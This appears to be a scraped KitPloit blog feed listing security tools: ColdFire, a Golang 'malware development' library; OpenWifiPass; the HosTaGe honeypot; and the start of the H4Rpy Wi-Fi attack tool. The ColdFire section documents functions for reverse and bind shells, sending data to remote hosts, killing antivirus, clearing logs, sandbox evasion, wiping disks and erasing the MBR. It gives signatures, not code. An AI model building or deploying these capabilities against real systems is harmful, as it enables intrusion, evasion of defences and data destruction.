href="https://github.com/frankwxu/digital-forensics-lab" rel="nofollow" target="_blank" title="Download Digital-Forensics-Lab">Download Digital-Forensics-Lab</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-86074918432042342122021-06-08T17:30:00.001-04:002021-06-08T17:30:00.283-04:00ColdFire - Golang Malware Development Library<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-AnqCEvi9z3I/YL1inZeFeOI/AAAAAAAAZ8U/2Y2o04BlGXU9MY9xBzXcEo_MKxtArdx_wCNcBGAsYHQ/s500/Coldfire_1_coldfire.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="500" data-original-width="500" height="320" src="https://1.bp.blogspot.com/-AnqCEvi9z3I/YL1inZeFeOI/AAAAAAAAZ8U/2Y2o04BlGXU9MY9xBzXcEo_MKxtArdx_wCNcBGAsYHQ/s320/Coldfire_1_coldfire.png" /></a></div><p align="center"><br /></p> <p align="center"> Golang <a href="https://www.kitploit.com/search/label/Malware%20Development" target="_blank" title="malware development">malware development</a> framework</p> <br /><span style="font-size: x-large;"><b>Introduction</b></span><br /> <p>ColdFire provides various methods useful for malware development in Golang.</p> <p>Most functions are compatible with both Linux and Windows operating systems.</p><span><a name='more'></a></span><div><br /></div><span 
style="font-size: x-large;"><b>Installation</b></span><br /> <p><code>go get github.com/redcode-labs/ColdFire</code></p> <br /><span style="font-size: x-large;"><b>Types of functions included</b></span><br /> <ul> <li>Logging</li> <li>Auxiliary</li> <li>Reconnaissance</li> <li>Evasion</li> <li>Administration</li> <li>Sandbox detection</li> <li>Disruptive</li> </ul> <br /><span style="font-size: x-large;"><b>Documentation</b></span><br /> <br /><span style="font-size: large;"><b>Logging functions</b></span><br /> <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content="func F(s string, arg ...interface{}) string Alias for fmt.Sprintf func PrintGood(msg string) Print good status message func PrintInfo(msg string) Print info status message func PrintError(msg string) Print error status message func PrintWarning(msg string) Print warning status message "><pre><code>func F(s string, arg ...interface{}) string <br /> Alias for fmt.Sprintf<br /><br />func PrintGood(msg string)<br /> Print good status message<br /><br />func PrintInfo(msg string)<br /> Print info status message<br /><br />func PrintError(msg string)<br /> Print error status message<br /> <br />func PrintWarning(msg string)<br /> Print warning status message <br /> <br /></code></pre></div> <br /><span style="font-size: large;"><b>Auxiliary functions</b></span><br /> <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content="func FileToSlice(file string) []string Read from file and return slice with lines delimited with newline. func Contains(s interface{}, elem interface{}) bool Check if interface type contains another interface type. func StrToInt(string_integer string) int Convert string to int. func IntToStr(i int) string Converts int to string. func IntervalToSeconds(interval string) int Converts given time interval to seconds. func RandomInt(min int, max int) int Returns a random int from range. 
func RandomSelectStr(list []string) string Returns a random selection from slice of strings. func RandomSelectInt(list []int) int Returns a random selection from slice of ints. func RandomSelectStrNested(list [][]string) []string Returns a random selection from nested string slice. func RemoveNewlines(s string) string Removes "\n" and "\r" characters from string. func FullRemove(str string, to_remove string) string Removes all occurences of substring. func RemoveDuplicatesStr(slice []string) []string Removes <a title="Duplicates" href="https://www.kitploit.com/search/label/Duplicates">duplicates</a> from string slice. func RemoveDuplicatesInt(slice []int) []int Removes duplicates from int slice. func ContainsAny(str string, elements []string) bool Returns true if slice contains a string. func RandomString(n int) string Generates random string of length [n] func ExitOnError(e error) Handle errors func Md5Hash(str string) string Returns MD5 checksum of a string func MakeZip(zip_file string, files []string) error Creates a zip archive from a list of files func ReadFile(filename string) (string, error) Read contents of a file. func WriteFile(filename string) error Write contents to a file. func B64d(str string) string Returns a base64 decoded string func B64e(str string) string Returns a base64 encoded string func FileExists(file string) bool Check if file exists. func ParseCidr(cidr string) ([]string, error) Returns a slice containing all possible IP addresses in the given range. "><pre><code>func FileToSlice(file string) []string<br /> Read from file and return slice with lines delimited with newline.<br /><br />func Contains(s interface{}, elem interface{}) bool <br /> Check if interface type contains another interface type.<br /><br />func StrToInt(string_integer string) int <br /> Convert string to int.<br /><br />func IntToStr(i int) string <br /> Converts int to string. 
<br /><br />func IntervalToSeconds(interval string) int <br /> Converts given time interval to seconds.<br /><br />func RandomInt(min int, max int) int<br /> Returns a random int from range.<br /><br />func RandomSelectStr(list []string) string <br /> Returns a random selection from slice of strings. <br /><br />func RandomSelectInt(list []int) int <br /> Returns a random selection from slice of ints. <br /><br />func RandomSelectStrNested(list [][]string) []string <br /> Returns a random selection from nested string slice.<br /><br />func RemoveNewlines(s string) string <br /> Removes "\n" and "\r" characters from string.<br /><br />func FullRemove(str string, to_remove string) string <br /> Removes all occurences of substring.<br /><br />func RemoveDuplicatesStr(slice []string) []string <br /> Removes duplicates from string slice.<br /><br />func RemoveDuplicatesInt(slice []int) []int <br /> Removes duplicates from int slice.<br /><br />func ContainsAny(str string, elements []string) bool <br /> Returns true if slice contains a string.<br /><br />func RandomString(n int) string<br /> Generates random string of length [n]<br /><br />func ExitOnError(e error)<br /> Handle errors<br /><br />func Md5Hash(str string) string<br /> Returns MD5 checksum of a string<br /><br />func MakeZip(zip_file string, files []string) error <br /> Creates a zip archive from a list of files<br /><br />func ReadFile(filename string) (string, error) <br /> Read contents of a file.<br /><br />func WriteFile(filename string) error <br /> Write contents to a file.<br /><br />func B64d(str string) string <br /> Returns a base64 decoded string<br /><br />func B64e(str string) string <br /> Returns a base64 encoded string<br /><br />func FileExists(file string) bool<br /> Check if file exists. 
<br /><br />func ParseCidr(cidr string) ([]string, error) <br /> Returns a slice containing all possible IP addresses in the given range.<br /><br /></code></pre></div> <br /><span style="font-size: large;"><b>Reconnaissance functions</b></span><br /> <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content=" func GetLocalIp() string Returns a local IP address of the machine. func GetGlobalIp() string Returns a global IP address of the machine. func IsRoot() bool Check if user has administrative privilleges. func Processes() (map[int]string, error) Returns all processes' PIDs and their corresponding names. func Iface() string, string Returns name of currently used <a title=" href="https://www.kitploit.com/search/label/Wireless" wireless="">wireless interface and it's MAC address. func Ifaces() []string Returns slice containing names of all local interfaces. func Disks() ([]string, error) Lists local storage devices func Users() []string, err Returns list of known users. func Info() map[string]string Returns basic system information. Possible fields: username, hostname, go_os, os, platform, cpu_num, kernel, core, local_ip, ap_ip, global_ip, mac. If the field cannot be resolved, it defaults to "N/A" value. func DnsLookup(hostname string) ([]string, error) Performs DNS lookup func RdnsLookup(ip string) ([]string, error) Performs reverse DNS lookup func HostsPassive(interval string) []string, err Passively discovers active hosts on a network using ARP monitoring. <a href="https://www.kitploit.com/search/label/Discovery" target="_blank" title="Discovery">Discovery</a> time can be changed using <interval> argument. func FilePermissions(filename string) (bool,bool) Checks if file has read and write permissions. func Portscan(target string, timeout, threads int) []int Returns list of <a href="https://www.kitploit.com/search/label/Open%20Ports" target="_blank" title="open ports">open ports</a> on target. 
func PortscanSingle(target string, port int) bool Returns true if selected port is open. func BannerGrab(target string, port int) (string, error) Grabs a service banner string from a given port. func Networks() ([]string, error) Returns list of nearby wireless networks. "><pre><code><br />func GetLocalIp() string<br /> Returns a local IP address of the machine.<br /><br />func GetGlobalIp() string<br /> Returns a global IP address of the machine.<br /> <br />func IsRoot() bool<br /> Check if user has administrative privilleges.<br /> <br />func Processes() (map[int]string, error)<br /> Returns all processes' PIDs and their corresponding names.<br /><br />func Iface() string, string<br /> Returns name of currently used wireless interface and it's MAC address. <br /><br />func Ifaces() []string<br /> Returns slice containing names of all local interfaces.<br /> <br />func Disks() ([]string, error) <br /> Lists local storage devices<br /> <br />func Users() []string, err<br /> Returns list of known users.<br /><br />func Info() map[string]string <br /> Returns basic system information. 
<br /> Possible fields: username, hostname, go_os, os, <br /> platform, cpu_num, kernel, core, local_ip, ap_ip, global_ip, mac.<br /> If the field cannot be resolved, it defaults to "N/A" value.<br /> <br />func DnsLookup(hostname string) ([]string, error) <br /> Performs DNS lookup<br /><br />func RdnsLookup(ip string) ([]string, error) <br /> Performs reverse DNS lookup<br /><br />func HostsPassive(interval string) []string, err<br /> Passively discovers active hosts on a network using ARP monitoring.<br /> Discovery time can be changed using <interval> argument.<br /> <br />func FilePermissions(filename string) (bool,bool) <br /> Checks if file has read and write permissions.<br /> <br />func Portscan(target string, timeout, threads int) []int <br /> Returns list of open ports on target.<br /><br />func PortscanSingle(target string, port int) bool <br /> Returns true if selected port is open.<br /> <br />func BannerGrab(target string, port int) (string, error) <br /> Grabs a service banner string from a given port.<br /> <br />func Networks() ([]string, error) <br /> Returns list of nearby wireless ne tworks.<br /> <br /></code></pre></div> <br /><span style="font-size: large;"><b>Administration functions</b></span><br /> <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content="func CmdOut(command string) string, error Execute a command and return it's output. func CmdOutPlatform(commands map[string]string) (string, error) Executes commands in platform-aware mode. For example, passing {"windows":"dir", "linux":"ls"} will execute different command, based on platform the implant was launched on. func CmdRun(command string) Unlike cmd_out(), cmd_run does not return anything, and prints output and error to STDOUT. func CmdDir(dirs_cmd map[string]string) ([]string, error) Executes commands in directory-aware mode. For example, passing {"/etc" : "ls"} will execute command "ls" under /etc directory. 
func CmdBlind(command string) Run command without supervision, do not print any output. func CreateUser(username, password string) error Creates a new user on the system. func Bind(port int) Run a bind shell on a given port. func Reverse(host string, port int) Run a reverse shell. func SendDataTcp(host string, port int, data string) error Sends string to a remote host using TCP protocol. func SendDataUdp(host string, port int, data string) error Sends string to a remote host using UDP protocol. func Download(url string) error Downloads a file from url and save it under the same name. func CopyFile(src string, dst string) error Copy a file from one place to another func CurrentDirFiles() []string, error Returns list of files from current directory "><pre><code>func CmdOut(command string) string, error<br /> Execute a command and return it's output.<br /><br />func CmdOutPlatform(commands map[string]string) (string, error) <br /> Executes commands in platform-aware mode.<br /> For example, passing {"windows":"dir", "linux":"ls"} will execute different command, <br /> based on platform the implant was launched on.<br /><br />func CmdRun(command string)<br /> Unlike cmd_out(), cmd_run does not return anything, and prints output and error to STDOUT.<br /><br />func CmdDir(dirs_cmd map[string]string) ([]string, error) <br /> Executes commands in directory-aware mode.<br /> For example, passing {"/etc" : "ls"} will execute command "ls" under /etc directory.<br /><br />func CmdBlind(command string)<br /> Run command without supervision, do not print any output.<br /> <br />func CreateUser(username, password string) error<br /> Creates a new user on the system.<br /> <br />func Bind(port int)<br /> Run a bind shell on a given port.<br /><br />func Reverse(host string, port int)<br /> Run a reverse shell.<br /><br />func SendDataTcp(host string, port int, data string) error <br /> Sends string to a remote host using TCP protocol.<br /><br />func SendDataUdp(host string, port 
int, data string) error <br /> Sends string to a remote host using UDP protocol.<br /> <br />func Download(url string) error<br /> Downloads a file from url and saves it under the same name.<br /><br />func CopyFile(src string, dst string) error<br /> Copy a file from one place to another<br /><br />func CurrentDirFiles() ([]string, error)<br /> Returns list of files from current directory<br /></code></pre></div> <br /><span style="font-size: large;"><b>Evasion functions</b></span><br /> <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content="func PkillPid(pid int) error Kill process by PID. func PkillName(name string) error Kill all processes that contain [name]. func PkillAv() error Kill most common AV processes. func Wait(interval string) Does nothing for a given interval of time. func Remove() Removes binary from the host. func SetTtl(interval string) Set time-to-live of the binary. Should be launched as a goroutine. func ClearLogs() error Clears most system logs. "><pre><code>func PkillPid(pid int) error<br /> Kill process by PID.<br /><br />func PkillName(name string) error<br /> Kill all processes that contain [name].<br /><br />func PkillAv() error<br /> Kill most common AV processes.<br /> <br />func Wait(interval string)<br /> Does nothing for a given interval of time.<br /><br />func Remove()<br /> Removes binary from the host.<br /> <br />func SetTtl(interval string)<br /> Set time-to-live of the binary.<br /> Should be launched as a goroutine.<br /> <br />func ClearLogs() error<br /> Clears most system logs.<br /></code></pre></div> <br /><span style="font-size: large;"><b>Sandbox detection functions</b></span><br /> <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content="func SandboxFilepath() bool Detect sandbox by looking for common sandbox filepaths. Compatible only with Windows. func SandboxProc() bool Detect sandbox by looking for common sandbox processes. 
func SandboxSleep() bool Detect sandbox by looking for sleep-acceleration mechanism. func SandboxDisk(size int) bool Detect sandbox by looking for abnormally small disk size. func SandboxCpu(cores int) bool Detect sandbox by looking for abnormally small number of CPU cores. func SandboxRam(ram_mb int) bool Detect sandbox by looking for abnormally small amount of RAM. func SandboxMac() bool Detect sandbox by looking for sandbox-specific MAC address of the localhost. func SandboxUtc() bool Detect sandbox by looking for properly set UTC time zone. func SandboxProcnum(proc_num int) bool Detect sandbox if small number of running processes func SandboxTmp(entries int) bool Detect sandbox if small number of entries under temporary dir func SandboxAll() bool Detect sandbox using all sandbox detection methods. Returns true if any sandbox-detection method returns true. func SandboxAll_n(num int) bool Detect sandbox using all sandbox detection methods. Returns true if at least <num> detection methods return true. "><pre><code>func SandboxFilepath() bool <br /> Detect sandbox by looking for common sandbox filepaths.<br /> Compatible only with Windows.<br /><br />func SandboxProc() bool <br /> Detect sandbox by looking for common sandbox processes.<br /><br />func SandboxSleep() bool<br /> Detect sandbox by looking for sleep-acceleration mechanism.<br /><br />func SandboxDisk(size int) bool<br /> Detect sandbox by looking for abnormally small disk size.<br /><br />func SandboxCpu(cores int) bool<br /> Detect sandbox by looking for abnormally small number of CPU cores.<br /><br />func SandboxRam(ram_mb int) bool<br /> Detect sandbox by looking for abnormally small amount of RAM.<br /><br />func SandboxMac() bool<br /> Detect sandbox by looking for sandbox-specific MAC address of the localhost. <br /><br />func SandboxUtc() bool<br /> Detect sandbox by looking for properly set UTC time zone. 
<br /><br />func SandboxProcnum(proc_num int) bool <br /> Detect sandbox if small number of running processes<br /><br />func SandboxTmp(entries int) bool <br /> Detect sandbox if small number of entries under temporary dir<br /><br />func SandboxAll() bool<br /> Detect sandbox using all sandbox detection methods.<br /> Returns true if any sandbox-detection method returns true. <br /><br />func SandboxAll_n(num int) bool<br /> Detect sandbox using all sandbox detection methods.<br /> Returns true if at least <num> detection methods return true.<br /></code></pre></div> <br /><span style="font-size: large;"><b>Disruptive functions</b></span><br /> <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content="func WifiDisconnect() error Disconnects from wireless access point func Wipe() error Wipes out entire filesystem. func EraseMbr(device string, partition_table bool) error Erases MBR sector of a device. If <partition_table> is true, erases also partition table. func Forkbomb() Runs a forkbomb. func Shutdown() error Reboot the machine. 
"><pre><code>func WifiDisconnect() error <br /> Disconnects from wireless access point<br /> <br />func Wipe() error<br /> Wipes out entire filesystem.<br /> <br />func EraseMbr(device string, partition_table bool) error <br /> Erases MBR sector of a device.<br /> If <partition_table> is true, erases also partition table.<br /> <br />func Forkbomb()<br /> Runs a forkbomb.<br /> <br />func Shutdown() error<br /> Reboot the machine.<br /><br /></code></pre></div> <br /><span style="font-size: x-large;"><b>Requirements</b></span><br /> <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content=""github.com/google/gopacket" "github.com/google/gopacket/layers" "github.com/google/gopacket/pcap" "github.com/robfig/cron" "github.com/anvie/port-scanner" "github.com/matishsiao/goInfo" "github.com/fatih/color" "github.com/minio/minio/pkg/disk" "github.com/dustin/go-humanize" "github.com/mitchellh/go-ps" "><pre><code>"github.com/google/gopacket"<br />"github.com/google/gopacket/layers"<br />"github.com/google/gopacket/pcap"<br />"github.com/robfig/cron"<br />"github.com/anvie/port-scanner"<br />"github.com/matishsiao/goInfo"<br />"github.com/fatih/color"<br />"github.com/minio/minio/pkg/disk"<br />"github.com/dustin/go-humanize"<br />"github.com/mitchellh/go-ps"<br /></code></pre></div> <br /><span style="font-size: x-large;"><b>Disclaimer</b></span><br /> <p>Developers are not responsible for any misuse regarding this tool. 
Use it only against systems that you are permitted to attack.</p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/redcode-labs/Coldfire" rel="nofollow" target="_blank" title="Download Coldfire">Download Coldfire</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-19294894468149043442021-02-26T08:30:00.005-03:002021-02-26T08:30:06.705-03:00OpenWifiPass - An Open Source Implementation Of Apple's Wi-Fi Password Sharing Protocol In Python<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-hl1ui4DNJnI/YDSUvQ6K-8I/AAAAAAAAVcA/1CJUslQwoAQQGiG45ItDg229cvNM7nXOgCNcBGAsYHQ/s787/wifi.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="474" data-original-width="787" height="386" src="https://1.bp.blogspot.com/-hl1ui4DNJnI/YDSUvQ6K-8I/AAAAAAAAVcA/1CJUslQwoAQQGiG45ItDg229cvNM7nXOgCNcBGAsYHQ/w640-h386/wifi.png" width="640" /></a></div><p><br /></p> <p>An open source implementation of the grantor role in Apple's Wi-Fi Password Sharing protocol.</p> <br /><span style="font-size: large;"><b>Disclaimer</b></span><br /> <p>OpenWifiPass is experimental software and is the result of reverse engineering efforts by the <a href="https://owlink.org" rel="nofollow" target="_blank" title="Open Wireless Link">Open Wireless Link</a> project. The code serves solely documentary and educational purposes. It is <em>untested</em> and <em>incomplete</em>. For example, the code <strong>does not verify the identity of the requestor</strong>. So, do not use this implementation with sensitive Wi-Fi credentials. 
OpenWifiPass is not affiliated with or endorsed by Apple Inc.</p><span><a name='more'></a></span><div><br /></div><span style="font-size: large;"><b>Requirements</b></span><br /> <p><strong>Hardware:</strong> <a href="https://www.kitploit.com/search/label/Bluetooth%20Low%20Energy" target="_blank" title="Bluetooth Low Energy">Bluetooth Low Energy</a> radio, e.g., <a href="https://www.kitploit.com/search/label/Raspberry%20Pi" target="_blank" title="Raspberry Pi">Raspberry Pi</a> 4</p> <p><strong>OS:</strong> Linux (due to the <code>bluepy</code> dependency)</p> <br /><span style="font-size: large;"><b>Install</b></span><br /> <p>Clone this repository and install it:</p> <div><pre><code>git clone git@github.com:seemoo-lab/openwifipass.git<br />pip3 install ./openwifipass</code></pre></div> <br /><span style="font-size: large;"><b>Run</b></span><br /> <p>Run <code>openwifipass</code> to share Wi-Fi credentials (<code>SSID</code> and <code>PSK</code>) with <em>any</em> requestor (we need super user privileges to use the Bluetooth subsystem):</p> <div><pre><code>sudo -E python3 -m openwifipass --ssid <SSID> --psk <PSK></code></pre></div> <p><strong>Use <a href="https://www.gnu.org/savannah-checkouts/gnu/bash/manual/bash.html#Quoting" rel="nofollow" target="_blank" title="quoting">quoting</a> of your shell to remove special meaning of certain characters in <code>SSID</code>/<code>PSK</code>.</strong> In the example below, we use single quotes (<code>'</code>) to prevent shell expansion of the <code>$</code> character in the PSK.</p> <p>A successful run of the protocol would look as follows:</p> <pre><code>pi@raspberrypi:~/openwifipass $ sudo -E python3 -m openwifipass --ssid OWL --psk '$uper$ecretPassword'<br />Start scanning...<br />SSID match in PWS advertisement from aa:bb:cc:dd:ee:ff<br />Connect to device aa:bb:cc:dd:ee:ff<br />Send PWS1<br />Receive PWS2<br />Send M1<br />Receive M2<br />Send M3<br />Receive M4<br />Send PWS3<br />Receive PWS4<br />Wi-Fi Password 
Sharing completed<br /></code></pre> <br /><span style="font-size: large;"><b>OPACK</b></span><br /> <p>This project contains a reusable OPACK (de)serializer. Read <a href="https://github.com/seemoo-lab/openwifipass/blob/main/OPACK.md" rel="nofollow" target="_blank" title="OPACK.md">OPACK.md</a> for more information.</p> <br /><span style="font-size: large;"><b>Authors</b></span><br /> <ul> <li>Jannik Lorenz</li> </ul> <br /><span style="font-size: large;"><b>Publications</b></span><br /> <ul> <li>Milan Stute, Alexander Heinrich, Jannik Lorenz, and Matthias Hollick. <strong>Disrupting Continuity of Apple’s Wireless Ecosystem Security: New Tracking, DoS, and MitM Attacks on iOS and macOS Through Bluetooth Low Energy, AWDL, and Wi-Fi.</strong> <em>30th USENIX Security Symposium (USENIX Security ’21)</em>, August 11–13, 2021, Vancouver, B.C., Canada. <em>To appear</em>.</li> <li>Jannik Lorenz. <strong>Wi-Fi Sharing for All: <a href="https://www.kitploit.com/search/label/Reverse%20Engineering" target="_blank" title="Reverse Engineering">Reverse Engineering</a> and Breaking the Apple Wi-Fi Password Sharing Protocol.</strong> Bachelor thesis, <em>Technical University of Darmstadt</em>, March 2020.</li> </ul> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/seemoo-lab/openwifipass" rel="nofollow" target="_blank" title="Download Openwifipass">Download Openwifipass</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-74871803417259985552021-01-19T08:30:00.010-03:002021-01-19T08:30:03.534-03:00HosTaGe - Low Interaction Mobile Honeypot<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-ZfiRYUE8MHg/YAZj7ncs6oI/AAAAAAAAVBo/x-EIVYrL0FYWVDdvy7aVl8T9yQ2bw8QvQCNcBGAsYHQ/s730/HosTaGe_0.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="730" 
data-original-width="349" height="640" src="https://1.bp.blogspot.com/-ZfiRYUE8MHg/YAZj7ncs6oI/AAAAAAAAVBo/x-EIVYrL0FYWVDdvy7aVl8T9yQ2bw8QvQCNcBGAsYHQ/w306-h640/HosTaGe_0.png" width="306" /></a></div><p><br /></p> <p>HosTaGe is a lightweight, low-interaction, portable, and generic <a href="https://www.kitploit.com/search/label/HoneyPot" target="_blank" title="honeypot">honeypot</a> for mobile devices that aims at the detection of malicious, <a href="https://www.kitploit.com/search/label/Wireless" target="_blank" title="wireless">wireless</a> network environments. As most malware propagates over the network via specific protocols, a low-interaction honeypot located at a mobile device can check wireless networks for actively propagating malware. We envision such honeypots running on all kinds of mobile devices, e.g., smartphones and tablets, to provide a quick assessment of the potential security state of a network.</p> <p>HosTaGe emulates the following <a href="https://www.kitploit.com/search/label/Protocols" target="_blank" title="protocols">protocols</a> as of the latest version: AMQP, COAP, ECHO, FTP, HTTP, HTTPS, MySQL, MQTT, MODBUS, S7COMM, SNMP, SIP, SMB, SSH, SMTP and TELNET</p><span><a name='more'></a></span><p><br /></p> <p><strong>Download from Play Store!</strong></p> <p>The stable release of HosTaGe can be installed from Google Play Store. 
<a href="https://play.google.com/store/apps/details?id=dk.aau.netsec.hostage" rel="nofollow" target="_blank" title="Play Store Link">Play Store Link</a> or scan the QR code below from your <a href="https://www.kitploit.com/search/label/Android" target="_blank" title="Android">Android</a> device.</p><p><br /></p><p style="text-align: center;"><iframe width="560" height="315" src="https://www.youtube.com/embed/nRrc2T8_oKM" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></p><p><br /></p> <p><strong>References</strong></p> <p>The <a href="https://www.kitploit.com/search/label/Research" target="_blank" title="research">research</a> behind HosTaGe has been published and presented in a number of scientific and industrial conferences. Below you can find some selected papers:</p> <p>[1] Emmanouil Vasilomanolakis, Shankar Karuppayah, Mathias Fischer, Mihai Plasoianu, Wulf Pfeiffer, Lars Pandikow, Max Mühlhäuser: This Network is Infected: HosTaGe – a Low-Interaction Honeypot for Mobile Devices. SPSM@CCS 2013:43-48</p> <p>[2] Emmanouil Vasilomanolakis, Shankar Karuppayah, Mathias Fischer, Max Mühlhäuser: HosTaGe: a Mobile Honeypot for Collaborative Defense. ACM SIN 2014:330-333</p> <p>[3] Emmanouil Vasilomanolakis, Shreyas Srinivasa, Max Mühlhäuser: Did you really hack a nuclear power plant? An industrial control mobile honeypot. IEEE CNS 2015:729-730</p> <p>[4] Emmanouil Vasilomanolakis, Shreyas Srinivasa, Carlos Garcia Cordero, Max Mühlhäuser: Multi-stage Attack Detection and Signature Generation with ICS Honeypots. 
IEEE/IFIP DISSECT@NOMS 2016:1227-1232</p> <p><strong>Download APK</strong></p> <p><a href="https://github.com/aau-network-security/HosTaGe/releases/download/v2.2.11/HosTaGe-2.2.11.apk" rel="nofollow" target="_blank" title="HosTaGe-v2.2.11.apk">HosTaGe-v2.2.11.apk</a> <a href="https://github.com/aau-network-security/HosTaGe/releases/tag/v2.2.11" rel="nofollow" target="_blank" title="Release-Notes">Release-Notes</a>(latest)</p> <p>HosTaGe-v2.1.1.apk <a href="https://github.com/aau-network-security/HosTaGe/releases/tag/v2.1.1" rel="nofollow" target="_blank" title="Release-Notes">Release-Notes</a></p> <p>HosTaGe-v2.0.0.apk <a href="https://github.com/aau-network-security/HosTaGe/releases/tag/v2.0.0" rel="nofollow" target="_blank" title="Release-Notes">Release-Notes</a></p> <p><strong>Wiki</strong></p> <p>The Wiki provides information on getting started and using the app. Wiki for HosTaGe can be found here: <a href="https://github.com/aau-network-security/HosTaGe/wiki/2.-Getting-Started" rel="nofollow" target="_blank" title="Wiki">Wiki</a>.</p> <p><strong>GUI</strong></p> <p><br /></p><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-qbchruAcSJc/YAZkKBxmyQI/AAAAAAAAVBs/eprbW-aL25QEJAjXOOJyyCOUFezEdYNSQCNcBGAsYHQ/s740/HosTaGe_4_alert.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="740" data-original-width="350" height="640" src="https://1.bp.blogspot.com/-qbchruAcSJc/YAZkKBxmyQI/AAAAAAAAVBs/eprbW-aL25QEJAjXOOJyyCOUFezEdYNSQCNcBGAsYHQ/w302-h640/HosTaGe_4_alert.gif" width="302" /></a></div><p><br /></p> <p><strong>Original Authors</strong></p> <p><a href="https://mvasiloma.com/" rel="nofollow" target="_blank" title="Emmanouil Vasilomanolakis">Emmanouil Vasilomanolakis</a> - idea, guidance and suggestions during development</p> <p><strong>Contributors</strong></p> <p><a href="https://sastry17.github.io/" rel="nofollow" target="_blank" title="Shreyas Srinivasa">Shreyas 
Srinivasa</a>, lead developer, Aalborg University and Technische Universität Darmstadt (Github - @sastry17)</p> <p>Eirini Lygerou, GSoC 2020 Developer (Github - @irinil)</p> <p>Mihai Plasoianu, student developer, Technische Universität Darmstadt</p> <p>Wulf Pfeiffer, student developer, Technische Universität Darmstadt</p> <p>Lars Pandikow, student developer, Technische Universität Darmstadt</p> <p><strong>Researchers</strong></p> <p><a href="https://www.kshankar.com/" rel="nofollow" target="_blank" title="Shankar Karuppayah">Shankar Karuppayah</a>, mentoring, developer, Technische Universität Darmstadt</p> <p><a href="https://www.inf.uni-hamburg.de/inst/ab/snp/team/fischer.html" rel="nofollow" target="_blank" title="Mathias Fischer">Mathias Fischer</a>, mentoring, Universität Hamburg</p> <p><a href="https://www.informatik.tu-darmstadt.de/telekooperation/telecooperation_group/staff_1/staff_1_details_23168.en.jsp" rel="nofollow" target="_blank" title="Max Mühlhäuser">Max Mühlhäuser</a>, mentoring, Technische Universität Darmstadt</p> <p>Carlos Garcia Cordero, mentoring, Technische Universität Darmstadt</p> <p>Features of HoneyRJ were the inspiration for this project. <a href="http://www.cse.wustl.edu/~jain/cse571-09/ftp/honey/manual.html" rel="nofollow" target="_blank" title="http://www.cse.wustl.edu/~jain/cse571-09/ftp/honey/manual.html">http://www.cse.wustl.edu/~jain/cse571-09/ftp/honey/manual.html</a></p> <p>Encryption for the SSH protocol was taken from Ganymed SSH-2 and slightly modified. <a href="http://code.google.com/p/ganymed-ssh-2/" rel="nofollow" target="_blank" title="http://code.google.com/p/ganymed-ssh-2/">http://code.google.com/p/ganymed-ssh-2/</a></p> <p><strong>GSoC 2020</strong></p> <p>The project was actively developed with participation in Google Summer of Code 2020. 
More information about GSoC2020 is <a href="https://summerofcode.withgoogle.com/projects/#5293206515744768" rel="nofollow" target="_blank" title="here">here</a></p> <p><strong>HPFeeds</strong></p> <p>To access the hpfeeds from hostage please send an access request to <a href="mailto:hostage@es.aau.dk" rel="nofollow" target="_blank" title="hostage@es.aau.dk">hostage@es.aau.dk</a> with your name and organization. Please note that access to the hpfeeds repository is provided only after an internal review.</p> <p><strong>Contact</strong></p> <p>Please use the Github issues to report any issues or for questions. <a href="https://honeynetpublic.slack.com/archives/CUCJPUE3H" rel="nofollow" target="_blank" title="Slack channel">Slack channel</a>; <a href="mailto:hostage@es.aau.dk" rel="nofollow" target="_blank" title="Email">Email</a></p> <p><br /></p><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/aau-network-security/HosTaGe" rel="nofollow" target="_blank" title="Download HosTaGe">Download HosTaGe</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-4204514429739899642020-09-04T17:30:00.000-04:002020-09-04T17:30:01.801-04:00H4Rpy - Automated WPA/WPA2 PSK Attack Tool<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-nnA7GERh8Rc/X0wSj97LxII/AAAAAAAATqs/smW8cv1fMGkDB4c_0cuKNpzMoSFBTGFbACNcBGAsYHQ/s1600/h4rpy_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="737" data-original-width="1366" height="344" src="https://1.bp.blogspot.com/-nnA7GERh8Rc/X0wSj97LxII/AAAAAAAATqs/smW8cv1fMGkDB4c_0cuKNpzMoSFBTGFbACNcBGAsYHQ/s640/h4rpy_2.png" width="640" /></a></div>
<br />
<strong>h4rpy</strong> is an <a href="https://www.kitploit.com/search/label/Automated" target="_blank" title="automated">automated</a> WPA/WPA2 PSK attack tool, wrapper of <a href="https://github.com/aircrack-ng/aircrack-ng" rel="nofollow" target="_blank" title="aircrack-ng framework">aircrack-ng framework</a>.<br />
